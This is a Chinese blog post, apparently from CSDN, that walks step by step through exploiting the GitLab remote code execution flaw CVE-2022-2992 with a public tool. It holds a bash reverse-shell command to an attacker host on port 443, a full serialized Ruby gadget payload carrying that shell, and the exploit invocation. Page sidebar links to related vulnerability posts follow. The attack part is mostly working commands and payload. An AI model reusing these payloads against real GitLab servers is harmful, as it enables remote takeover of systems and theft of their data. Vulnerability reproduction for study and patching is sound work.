gitlab 命令执行漏洞(CVE-2022-2992)

已于 2024-01-15 15:53:21 修改
阅读量2k 收藏 12
点赞数 9
分类专栏: 漏洞复现 文章标签: gitlab CVE-2022-2992
于 2024-01-15 15:50:03 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/135603533
版权

1.漏洞影响版本

GitLab CE/EE 中的一个漏洞影响从 11.10 开始到 15.1.6 之前的所有版本、从 15.2 开始到 15.2.4 之前的所有版本、从 15.3 开始到 15.3.2 之前的所有版本。允许经过身份验证的用户通过从 GitHub API 端点导入实现远程代码执行。
image.png
查看 gitlab 版本。(登录后才能看到)
http://xxx/api/v4/version

2.漏洞工具

https://github.com/CsEnox/CVE-2022-2992#expected-output-in-each-window
装一下工具环境

sudo apt install ruby python3 python3-pip
gem install redis (一般这个都没装)
pip install flask

3.漏洞利用

1.现在要生成序列化的有效负载,请运行Payload_gen.rb并保存有效负载。下面是一个例子:
ruby payload_gen.rb ‘bash -c “sh -i >& /dev/tcp/xxx29/443 0>&1”’
image.png

2.在server.py中相应地更新 NGROK_URL 和 PAYLOAD 变量。下面是一个例子:
(NGROK_URL替换为攻击机所在vpsip。)

PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/xxx29/443 0>&1\"\u0006;\fT;\u0012:\fresolve'
NGROK_URL = 'http://vpsip:5000'

3.注册 gitlab 账号,在 gitlab 上为用户创建访问令牌并选择所有范围。
http://xxxxx/-/profile/personal_access_tokens
image.png
image.png

4.运行exploit.py,注意,这里直接在vps 运行,可以省略使用工具中提到的ngrok工具做内网穿透,实测使用ngrok做内网穿透也会有访问上的问题,强烈推荐直接使用vps 运行 exploit.py。

python3 exploit.py -a ZjY4CzUxxxxx -u http://vpsip:5000 -t http://www.gitlab.com:4567/

image.png
5.命令执行成功。
在这里插入图片描述

LQxdp
关注
专栏目录
漏洞复现】4. Gitlab exiftool远程命令执行漏洞CVE-2021-22205)复现与分析
Zichel77的博客
03-21 1403
Gitlab是由Gitlab Inc.开发,基于网络的GIt仓库管理工具,且具有wiki和issue跟踪功能,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务,通过Web界面进行访问公开的或私人的项目。2021年4月5日,GitLab官方发布安全更新修复了此GitLab命令执行漏洞CVE-2021-22205)。
GitLab爆出惊天漏洞,攻击者可轻易操控Pipeline作业!新加坡警方一网打尽,全球黑客犯罪集团六名要犯落网!Mustang Panda升级恶意武器库,亚太地区政府遭严密监视!| 安全周报0913
weixin_55163056的博客
09-13 1593
惊爆!Linux遭神秘恶意软件袭击,Oracle Weblogic成挖矿门户!GitLab爆出惊天漏洞,攻击者可轻易操控Pipeline作业!新加坡警方一网打尽,全球黑客犯罪集团六名要犯落网!微软大曝光!79个漏洞补丁齐发,3大Windows漏洞正被黑客疯狂利用!Mustang Panda升级恶意武器库,亚太地区政府遭严密监视!
探秘CVE-2022-2992GitLab通过GitHub导入的远程命令执行漏洞
gitblog_00056的博客
06-08 466
探秘CVE-2022-2992GitLab通过GitHub导入的远程命令执行漏洞 去发现同类优质开源项目:https://gitcode.com/ 在开放源代码的世界里,安全总是优先考虑的问题。CVE-2022-2992就是一个值得我们关注的安全事件,它涉及GitLab的一个严重漏洞,允许授权用户通过GitHub导入API实现远程代码执行。这个漏洞影响了多个GitLab版本,但幸运的是,开发者社...
漏洞复现-GitLab任意读取文件(CVE-2023-2825)
玄道的网安博客
08-12 474
据悉,该漏洞影响 GitLab社区版(CE)和企业版(EE)的 16.0.0 版本,其它更早的版本几乎都不受影响。该漏洞存在于GitLab CE/EE版本16.0.0中,当嵌套在至少五个组中的公共项目中存在附件时,可在未经身份验证的情况下通过uploads功能遍历读取任意文件,导致敏感信息泄露。因此,我们需要先绕过nginx,一旦通过了校验,nginx会将未经解码处理的URL传递给Workhorse。分析nginx的代码后,不难发现在处理复杂的URI时,nginx会对URL编码的部分进行解码。
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
【严重】GitLab 存在代码执行漏洞
murphysec的博客
06-01 845
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。gitlab@影响所有版本。
GitLab远程代码执行漏洞(CVE-2022-2992)处理
x10n9的博客
09-08 1912
漏洞存在是由于未对GitHub中导入的API端点请求数据进行校验。经过身份认证的远程攻击者可通过发送特制的请求包最终在目标机器上执行任意代码。可以通过禁用 GitHub 导入来缓解。5.确认“GitHub”没有作为导入选项出现。4.在“导入源”下禁用“GitHub”选项。1.在浏览器窗口中,以任何用户身份登录。3.展开“可见性和访问控制”选项卡。1.点击“菜单”->“管理”。2.点击“设置”->“常规”。3.点击“新建项目/存储库”。2.点击顶部栏上的“+”。5.点击“保存更改”。4.点击“导入项目”。
GitLab:注意严重的任意分支管道执行漏洞
最新发布
smellycat000的专栏
10-11 411
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 发布安全更新,修复了位于社区版 (CE) 和企业版 (EE) 中的多个漏洞,其中一个是严重的任意分支管道执行漏洞 (CVE-2024-9164)。该漏洞可导致未授权用户在仓库的任何分支上触发持续集成/持续交付 (CI/CD) 管道。CI/CD管道是执行多种任务如构建、测试和部署代码的自动化流程,通常仅向具有恰当权限的用户开放。如攻击...
2024年最全网络安全-一句话木马(1),顺利拿到offer
2301_79985178的博客
05-05 388
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。
Gitlab 远程命令执行RCE漏洞CVE-2021-22205附exp
god_Zeo的安全博客
10-31 6091
0x01 漏洞介绍&原理 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,是一款Ruby开发的Git项目管理平台。由于在11.9以后的GitLab中,使用了图片处理工具ExifTool,而此图片处理工具又受到了漏洞CVE-2021-22204的影响: 漏洞触发ExifTool功能处,ExifTool是用于从图像中移除元数据的开源工具,在解析上传图像中的元数据时,并没有完全解析某些元数据,导致攻击者上传带有恶意元数据的图片,从而导致远程命令执行。 攻击者可以通过一个存在
GitLab远程代码执行漏洞风险提示(CVE-2022-2185)
qzt961003的博客
07-05 4097
近日, GitLab 官方发布了安全公告,修复了 GitLab 社区版(CE)和企业版(EE)中的一个远程代码执行漏洞CVE-2022-2185),CVSS 评分 9.9,该漏洞源于授权用户可以导入恶意制作的项目导致远程代码执行,成功利用此漏洞的攻击者可获得服务器权限。目前官方已发布安全版本,建议受影响的用户尽快采取安全措施。...
Gitlab 远程命令执行漏洞CVE-2021-22205)分析
ML_Team的博客
10-29 3570
0x01 前言 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。 0x02 漏洞分析 未授权的端口在于用户注册:https://xx.xx.xx.xx/users/sign_up 还可以滥用Gitlab API接口列出所有项目(包括私有项目) https://xx.xx.xx.xx/api/v4/projec.
漏洞复现】 CVE-2021-22205 GitLab 远程命令执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
11-05 2346
0x01 漏洞背景描述 2021年4⽉15⽇,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。 GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提
漏洞预警】Gitlab 曝出远程代码执行漏洞
murphysec的博客
07-01 1052
2022年7月1日,OSCS 监测到 Gitlab 曝出远程代码执行漏洞。该漏洞等级较为严重。GitLab 中授权用户可以导入恶意制作的项目导致远程代码执行,攻击者可利用该漏洞执行任意远程代码,OSCS 建议各位开发者关注漏洞风险。GitLab 是美国 GitLab 公司的一款使用 Ruby on Rails 开发的、自托管的、Git(版本控制系统)项目仓库应用程序,开发者可通过 Web 界面访问公开或私人项目。漏洞评级:严重影响项目:GitLab影响版本:获取 GitLab 版本,判断其版本在 [14.0
GitLab存在任意用户密码重置漏洞CVE-2023-7028)
qq_32947907的博客
01-16 1156
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。•排查gitlab-rails/production_json.log日志中是否有访问/users/password接口,且参数中包含多个邮件地址。当Gitlab启用邮箱登录、启用SMTP时,向密码重置接口发送payload,此步骤需要掌握一个已知邮箱账户。3)未开启多因素认证。
GitLab 存储型XSS漏洞CVE-2023-0050)
murphysec的博客
03-09 727
GitLab 是由GitLab公司开发的、基于Git的集成软件开发平台。kroki是一款集成在GitLab的基于文本的图表描述自动转为图片的开源工具,在GitLab 13.7引入。 由于Kroki中lib/banzai/filter/kroki_filter.rb对接收的image_src过滤不严,具有AsciiDoc、Markdown、reStructuredText 或 Textile 文档编辑权限的攻击者可通过恶意构造的Kroki图,当用户访问的页面对Kroki图渲染时,即可触发恶意代码,进行执行
GitLab 目录遍历漏洞复现(CVE-2023-2825)
0xSec
05-27 3904
GitLab 存在目录遍历漏洞,当嵌套在至少五个组中的公共项目中存在附件时,未经身份验证的恶意用户可以利用该漏洞读取服务器上的任意文件。
漏洞GitLab中(CVE-2023-2825)
ptsecurity的博客
06-06 2690
我们想告诉你另一个CVE-2023-2825漏洞,我们认为这是一个趋势性的漏洞。CVSS3.1: 10.0影响到GitLab社区版和企业版16.0.0产品。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值